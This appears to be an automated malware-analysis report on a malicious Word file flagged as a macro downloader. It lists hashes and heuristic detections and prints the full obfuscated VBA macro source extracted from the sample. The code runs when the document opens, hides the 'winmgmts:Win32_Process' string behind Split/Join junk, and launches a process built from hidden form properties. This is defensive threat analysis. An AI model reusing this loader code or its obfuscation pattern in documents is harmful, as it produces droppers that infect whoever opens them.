Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f9ab3ee1514dae43…

MALICIOUS

Office (OLE)

94.9 KB Created: 2019-12-18 21:19:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: efa8250a8a2f3f4d27d507d49e51e14f SHA-1: 0a11263e94c0ff154c13fd38c8e8ab05c6456405 SHA-256: f9ab3ee1514dae4322626bbfbe23a086c9bccbdb9a4cc769a9df55260c10ad0f
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Sagent-7464899-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sagent-7464899-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Gpyeudldhk = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Xofpburdpzfhw.Stdyjyjgeeusl + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Yxosoplxru = VBA.CreateObject(JJKBSKJ + Gpyeudldhk)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11211 bytes
SHA-256: 6b95ff559c32f4e905dba213520798fe8defd4f47c7aed07ea1386869081b506
Detection
ClamAV: No threats found
Obfuscation or payload: likely
306 of 518 identifiers look randomly generated (e.g. 'Yyphimcifgfxh') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Xofpburdpzfhw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Stdyjyjgeeusl, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Grneykakqgy = Ejfradbgyxu
Tooxdorvhcgb = 501
Ydsildpgokbyx = ("Voluptatibus quaerat.")
Huteerlvsc = (213)
Dim Sxgzpagdcgoix As Integer
Dim Zevfqxlzin As Integer
Dim Gmhzgbgxiilmy As Boolean
Dim Hbgkgyemrxx As Integer
Dim Hyymrezqvgihq As Boolean
Dim Qtjhzhdyc As Boolean
Dim Wcaqcjiiqkj As Double
Tramuxcpqzvy = (833)
Dim Trdawjahxqf As Integer
Yirthtonhgrde = ("Qui et laborum aspernatur aut eum quasi omnis reiciendis consequuntur.")
Gcerotpq = (920)
Dim Nptmujhqye As Boolean
Foeycmkmwsjzb = Npfjsfjtev
Xkmfvuhwpnp = Fznvguly
Atvotwvadazn = "Magnam et pariatur nulla."
Mneuzwzang = 894
   Fjiyslwpq = Dtgaecgrlrwl
Tooyozyyztppl = 872
Vnuuobyezveg = ("Adipisci quidem.")
Njybzywh = (976)
Dim Mvetmkor As Boolean
Dim Qebqsxvkodjth As Integer
Dim Krnlrxnwsi As Double
Dim Erpgnpukjhhjb As Double
Dim Tntsngibsb As Integer
Dim Ycijizbrszxwd As Integer
Dim Cdjekoluiyp As Double
Wpwfgrvhbxz = (171)
Dim Mtuqxpar As String
Jwvknizlsukuc = ("Asperiores expedita sit tenetur.")
Pmrgafkujcrz = (243)
Dim Aezqrnil As Boolean
Zbmgpqrrr = Cilftybli
Gjsplelpj = Jgytdftka
Uxvnkxohzymr = "Quod illum vel."
Nzfmfcod = 6
   Oudbqxfpxgt = Utahwrjh
Wuwpjfjetnc = 13
Ufpaomaunacjb = ("Fuga magni voluptatem.")
Xdsfhehgu = (830)
Dim Jnbarycwgbgq As String
Dim Gvjtuginegqu As Boolean
Dim Smzussdnsm As Double
Dim Gemcqmxk As Boolean
Dim Ynzamwjukw As Integer
Dim Etcmycrtcwjr As Boolean
Dim Acqdxlji As Double
Urfhexcnbp = (622)
Dim Aeovtihcdiaj As Double
Egyqivfqr = ("Quaerat.")
Jpeuwqkdiblpc = (253)
Dim Blimqwmx As Boolean
Olgfnjniyjtc = Sqgnfsrwx
Uiepzxrlyhfe = Sygdihydbtaq
Aesnzksbiszl = "Eius nostrum voluptatum."
Iynmirmukso = 433
Xeqdkxosuz
End Sub

Attribute VB_Name = "Jjhofdqxiurkk"
Attribute VB_Base = "0{15954FE8-24E7-4CA3-9B30-1D177D7A8905}{88032DE1-B386-4B50-A288-4C0B5E3EA6CA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Wvynevhrwqz"
Function Anjcjozq()
   Xigrbjqkmxns = Xlcwvsiso
Ytjhbvsdsnmlv = 723
Ptppodxz = ("Quam tempore dolores.")
Wqcnmftirdpg = (766)
Dim Cupbskzgyt As Boolean
Dim Cykvaufmefq As String
Dim Hsdduliqe As Boolean
Dim Owgtuprjjxcu As Boolean
Dim Cvaqgxezvkrwc As String
Dim Uyxlqhenm As Double
Dim Nhgifyfhsqi As Double
Qpobwbymnboye = (49)
Dim Oyioxrjxt As Integer
Trvlrmzzu = ("Voluptate.")
Drkucafsjaox = (971)
Dim Hubhhsvoqhgr As Integer
Bzeogwvrdd = Rbceeucrj
Snjxoadnlzuqj = Qwyprysyaummc
Jajcmbwzgrz = "Enim aut et voluptas."
Jwksiedg = 981
Lnkulqkjltpjq = Xofpburdpzfhw.Stdyjyjgeeusl
   Fierzypl = Dnicxrxwqu
Gcudinzsw = 542
Enzgkrrj = ("Itaque harum incidunt quae qui natus.")
Rsyxypeu = (586)
Dim Clbbbxwpcmfq As Integer
Dim Dpxlmeylod As Double
Dim Vgjyuxyfat As Boolean
Dim Fnvbhovbontjs As String
Dim Svrwxmrbq As Integer
Dim Rirykjcz As Integer
Dim Jwezinvimafbp As Integer
Jwolnmfwcw = (987)
Dim Pdkgsmjjyn As String
Zwsefypsmpa = ("Aaron")
Osmeabcvdff = (695)
Dim Mpfvlwzzmrta As Boolean
Huxacxseu = Xlvtvrncl
Mqdenocb = Jwvbgece
Uiqnkegqz = "Atque beatae ipsam."
Fsghgxyjdcseb = 566
Rsnsbdgdv = Lnkulqkjltpjq + Jjhofdqxiurkk.Xsfedjxbjc + Jjhofdqxiurkk.Mdeidzxkn + Jjhofdqxiurkk.Wcilntyaqhw
   Ucokmspkuqngp = Qwevphuah
Rzvvhwfh = 85
Jtmtbnlewi = ("Esse quam laboriosam quo consectetur sunt modi.")
Aysmxlrzb = (769)
Dim Mapoyirbh As String
Dim Hcrcntjwkuykz As String
Dim Uytpiicl As Double
Dim Mymvfguscrqu As Boolean
Dim Ypfwooqqrvosi As Double
Dim Perrkbuxa As Double
Dim Erwfmzevqsd As Integer
Lcvhqhnxbmnmy = (474)
Dim Xdsfqajzum As Integer
Nnbnmzughfn = ("Veronica")
Sqceisnwtxma = (385)
Dim Wbdbugszkay As Double
Ewcrqlmykhu = Wsuponokyeee
Atfcgheizrgwo = Mujpakzfull
Fsxmxmlf = "Reprehenderit beatae ea."
Ndpntcisz = 839
Mnqvtmkdzrnn = Rsnsbdgdv + Jjhofdqxiurkk.Oqpuqkwryefz + Jjhofdqxiurkk.Ujgxavhcswol.Factoid
   Mtuxzojapnbtz = Ftpjyuboqqb
Optyaifcrb = 224
Asukrdtzdoul = ("Natus ut enim.")
Dledhyvz = (844)
Dim Uctqzlosroycg As String
Dim Nhsgauhewfuxn As Integer
Dim Zbgupokc As String
Dim Zcuffaeaetqc As String
Dim Emyxkfnbyq As Integer
Dim Vmokcfsoasnzq As Integer
Dim Wiakwivqdqn As Integer
Dyeeqifsmtrl = (645)
Dim Lmzygfpr As Boolean
Fsoavlupmxkbo = ("Quo quis.")
Iaxkojzmfj = (442)
Dim Rgmfmggy As String
Ewbzbymsjyqp = Sgeoggiqr
Jasyvhll = Ajphbamagnci
Fbrrrlnftw = "Velit."
Tuoqedkjrxogf = 773
Anjcjozq = Ifqiqcmh + Mnqvtmkdzrnn + Ifqiqcmh
   Rynumidrot = Wquqxrcf
Enmpaljnmvu = 988
Dccmrqzcwtms = ("Sunt deserunt inventore.")
Kubjhzdta = (258)
Dim Hribhiiwxrnuf As Integer
Dim Nlitzxwgzsk As Double
Dim Apkcuojyrb As Boolean
Dim Dvhnwawysm As String
Dim Gialljixvv As String
Dim Hlarbqwks As Integer
Dim Botcsoouowyvm As Boolean
Nhtrpiazgkzfx = (433)
Dim Isymywsgpjh As Double
Kipoccdoq = ("In hic eveniet ullam aspernatur ea consequatur.")
Obpmrsirsxog = (696)
Dim Qcvbdiigsoyvl As Integer
Xbrrgyxgfowa = Jwbsomaimn
Hiaowggwuw = Qbsvpnghrxi
Cxqupoeywqogq = "Ratione reprehenderit minus repudiandae tempora."
Utonzmbntes = 390
End Function
Function Xeqdkxosuz()
   Thhadkhpjfl = Ehmfaomrqyb
Ggpnzofvzrl = 99
Hnpgycknt = ("Dolor eaque.")
Aabywdjfdmdba = (598)
Dim Wcsepauvg As String
Dim Jzymdnds As Double
Dim Ngzwifhsdmoks As Integer
Dim Upnwgeuyt As Boolean
Dim Gqiqxhigjv As String
Dim Humddnnyg As Boolean
Dim Jypwgusif As Double
Yrjnohbmwmahg = (43)
Dim Brlgvdolzshl As String
Qnofjvuupy = ("Cumque et excepturi excepturi minus ea tempora ratione ut.")
Uwsjqjumtbwzg = (386)
Dim Fkvgvzafzm As String
Fzgbmzzjstpby = Spqozolpjus
Tqswompnmzkzh = Mutifjipjxci
Wgupcqbatm = "Voluptatum."
Cfpgpsdt = 191
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Gpyeudldhk = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Xofpburdpzfhw.Stdyjyjgeeusl + "rocess"
   Dmcvvyrtlwj = Ajcwimdhjlgxt
Gmadxtxuohev = 544
Bjphqplekfl = ("Possimus aut.")
Tavybkvmy = (726)
Dim Leconpdqz As Boolean
Dim Crqcyjbcv As Boolean
Dim Ndusidkicdni As Double
Dim Mwrvbvfnmy As String
Dim Ymmkwaorr As Double
Dim Ugafqpeoiuql As String
Dim Gtwnzrvoae As Integer
Sgnteuocwoapp = (641)
Dim Kwohbzzqg As String
Rgzggvhu = ("Ipsa.")
Bopvxkorshybj = (947)
Dim Lwwwsqgbzdhc As Integer
Fhvakiiym = Lynlfpxopvy
Fhumqsphzjnzd = Bjmksggstquoj
Mgwxvdov = "Hic."
Oimozlbozmfi = 590
Set Yxosoplxru = VBA.CreateObject(JJKBSKJ + Gpyeudldhk)
   Auopscfh = Nwkydiwywy
Wuhyzguglp = 380
Sulkrfvhhohow = ("Delectus sint magnam expedita consequuntur impedit nam quas corrupti.")
Ozsjccnyuhtcy = (269)
Dim Axfkgjwm As Boolean
Dim Dteimtbmjfgs As Double
Dim Xfwrcxcxtfn As Double
Dim Mhornlrzii As Double
Dim Osqohvhsr As String
Dim Mfjkogaz As Integer
Dim Kpfvnthn As Boolean
Xgjofmimjfr = (211)
Dim Gbmdactiiufdc As Boolean
Ucaecxdgvvfc = ("Molestiae eius aut temporibus.")
Qpktqztbqhk = (709)
Dim Omekccprh As Boolean
Obcvrhuavus = Kllzslsthrpt
Caivijxeox = Imkalwhjaq
Zvmthknbawr = "Numquam."
Yjvxfxoajcg = 461
Bleyiybjgz = Gpyeudldhk + Jjhofdqxiurkk.Spwozngegd.ControlTipText + Jjhofdqxiurkk.Bvtcydyvdjcvx.ControlTipText
   Gmppxwmjsu = Xlrpvirxh
Nlbdriqqr = 744
Qnzrscciyq = ("Et distinctio dolorem quia.")
Vajiqhkwb = (512)
Dim Cewtvbcek As Boolean
Dim Veqdqpvyep As Boolean
Dim Gdiazihbk As Boolean
Dim Wnwjghwmf As Double
Dim Efsmrubczq As Integer
Dim Ppnacvcibiwtq As Integer
Dim Orhdshwzc As String
Rmzhnrrngtt = (116)
Dim Qcohwiywxonl As Double
Mstqktpeqi = ("Victoria")
Ebcmmuknmpsp = (426)
Dim Irtymwvefvnd As String
Emmfobdxtkb = Eawzdmqk
Swwzawhzjl = Admabqlyiw
Reivjqtcgaujr = "Qui minus."
Allsgdvz = 4
Zcrymmqj = Bleyiybjgz + Xofpburdpzfhw.Stdyjyjgeeusl
   Dyiceexn = Psrftijqm
Npsxyypagj = 309
Fppzimugvsuac = ("In qui ut.")
Blvnltopj = (324)
Dim Ggimnwatm As String
Dim Iaesnqvv As Double
Dim Ptnpkvdgqzfj As Double
Dim Oyiexajwo As Double
Dim Vjtfxuox As Boolean
Dim Mvxcbxmvqyz As Boolean
Dim Ephqxrksfpmpl As Boolean
Tfrlsocc = (219)
Dim Wdxaxzdy As Integer
Qpdrfayhfkn = ("Provident odit sapiente.")
Kckhnejcmwo = (538)
Dim Mrhqjqauldb As Integer
Rpuwaohpm = Spubmdtprr
Zpbxpszyj = Mthpwzszz
Xuvyhhklioei = "Et omnis occaecati consequatur eius repudiandae tenetur nesciunt adipisci eos."
Yqsxnzdkh = 881
Set Xeqdkxosuz = CreateObject(Zcrymmqj)
   Fuyprikbxnsi = Pngpxakwbbd
Fxrifwmtmy = 484
Nfdxzhaknl = ("Odit nobis adipisci inventore.")
Buwijsxmuze = (260)
Dim Fnlbucofg As Double
Dim Hzbtdmvtwbhk As Boolean
Dim Ktbnonaz As Integer
Dim Toitimkvkbbj As Double
Dim Jielhfyd As String
Dim Kjnsrwuhigzoe As Integer
Dim Jqlaybabxe As Integer
Oslwqckjzz = (116)
Dim Ogualeue As Integer
Xomcmwjh = ("Debitis soluta.")
Lmgpwjjltsl = (498)
Dim Ilshzqtjchnvx As Integer
Pnzsjerbafd = Ikjpmqdrupkq
Jfstzyvw = Tbtqkrcvpxar
Ighwuypblbiwh = "Reiciendis necessitatibus optio in quas et tenetur."
Czmeqwkx = 547
Xeqdkxosuz.XSize = False
   Vceqxzpelljm = Mcnscblnsln
Fqmemnizkegl = 646
Xfrjemhdd = ("Jennie")
Zpihksddf = (548)
Dim Zhxzercxhgt As Double
Dim Iabigmcnyzm As Double
Dim Rzmdhdwjgjmeh As Integer
Dim Fgxgtuzj As Integer
Dim Wtgabhlaezcl As Integer
Dim Pydcrpdzwbhrc As String
Dim Fspvikkpj As Integer
Becqyucy = (817)
Dim Rxsbrxwftjff As Double
Gmpvoejtxpozw = ("Quo impedit.")
Modnjnvx = (581)
Dim Nnkqvwvicjl As String
Knmxzdnra = Gubrmllp
Aqydcssru = Hitaxqvtgznw
Auewryvjcj = "Mike"
Txlvagujymh = 866
Xeqdkxosuz.YSize = False
   Xskqrqlf = Chtwhpvxk
Cntymclfwhv = 350
Jwmnrxphd = ("Mollitia.")
Xahywqjfpnue = (595)
Dim Fnzavzhhkmlc As String
Dim Mvjysablv As String
Dim Gyqkuprvvl As Boolean
Dim Ghwlppunthc As Double
Dim Dvmqqtrnqpaq As Integer
Dim Xthmucfcrvp As Boolean
Dim Azpyvxqrteeer As Boolean
Psvusaxt = (247)
Dim Hpoberbfxqnb As Boolean
Shydpcicj = ("Wendy")
Zzvtvcfcdo = (190)
Dim Qpnczubo As Boolean
Qbkbuejn = Lofrglcnh
Qkfiobziiin = Juitibtpjbqbj
Ornhqnzqftfck = "Corporis est labore perspiciatis corrupti excepturi magnam in quisquam."
Yyphimcifgfxh = 210
Do While Yxosoplxru.Create(UJNDB & Anjcjozq, Dsutdmkeefyq, Xeqdkxosuz, Cfakhorxp)
Loop
   Mahtodwb = Xfobwslkchll
Etlnfxqxbqwhe = 643
Ruuvufwnz = ("Dolorem corrupti.")
Otciqafio = (206)
Dim Jwuczeyepnzc As String
Dim Rqatigmcxi As Integer
Dim Tawcvxmakyar As Boolean
Dim Puvtoqrvykep As Double
Dim Egymfekyinr As Boolean
Dim Lbtpioqqshd As Integer
Dim Dxbmxgryv As Integer
Olagrliclagtf = (401)
Dim Apymzvrzanwwp As Integer
Rpxtbxnjyh = ("Numquam consequatur.")
Ifxevsbf = (307)
Dim Jedwmztuosqai As Integer
Lsynfzfatjudi = Nfjsgtpek
Esgkhwgijzd = Aeeknrwktkflr
Cvnnzovmui = "Dolorum at impedit."
Warekmlrcofrt = 40
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.